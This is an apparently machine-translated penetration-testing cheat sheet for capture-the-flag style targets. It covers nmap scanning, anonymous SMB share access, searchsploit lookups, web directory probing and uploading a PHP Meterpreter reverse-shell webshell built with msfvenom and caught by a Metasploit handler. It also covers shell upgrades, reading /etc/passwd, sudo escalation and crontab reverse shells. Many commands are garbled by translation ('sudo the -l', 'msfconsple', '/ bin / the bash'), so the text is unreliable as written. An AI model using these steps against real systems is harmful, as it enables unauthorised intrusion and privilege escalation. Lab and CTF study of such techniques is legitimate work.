SMB Information Disclosure
First, nmap -sV IP nmap -A -v -T4 IP
scan for open services, and detailed information on all
For the SMB protocol, use an empty password login attempts, download to view sensitive information
smbclient -L IP to view the SMB file sharing under the IP address
smbclient '\\ IP \ file' remote access to the folder
get download file
You can also take advantage of loopholes in the version
searchsploit version
Http protocol vulnerability analysis for the
browser to view web pages
using dirb nikto probe
landing target service background, upload webshell
particular attention to database users
Production webshell
msfvenom -p PHP / Meterpreter / reverse_tcp lhost = attack IP lport = 4444 -f raw> /root/Desktop/shell.php
使用webshell
msfconsple
>use exploit/multi/hander
>set payload php/meterpreter/reverse_tcp
>show options
>set lhost IP
>run
In 404 upload upload point shell
access on a web page
Optimization of the shell
Python -C "Import Pty; pty.spawn ( '/ bin / the bash')"
View user
CAT / etc / passwd
su switch user
sudo the -l
sudo su obtain permission
Note that / tmp buffering and timing tasks directory / etc / crontab set, the task switching shell bounced
FTP
1. nmap scanning
-sV -A -v -T4
2.-21 is the FTP port
3. searchsploit version search script, modifying parameters, using code
4. msf or using remote overflow
msfconsole
> Search version number
> use exploit / ;; ;;;;;;;;;;;;
> Show payload
> the SET payload
> Show opintion
> various parameters of the SET
> exploit
5.id permission to view
the optimization terminal
python "import pty; pty.spawn ( ' / bin / bash')"
6. Check flag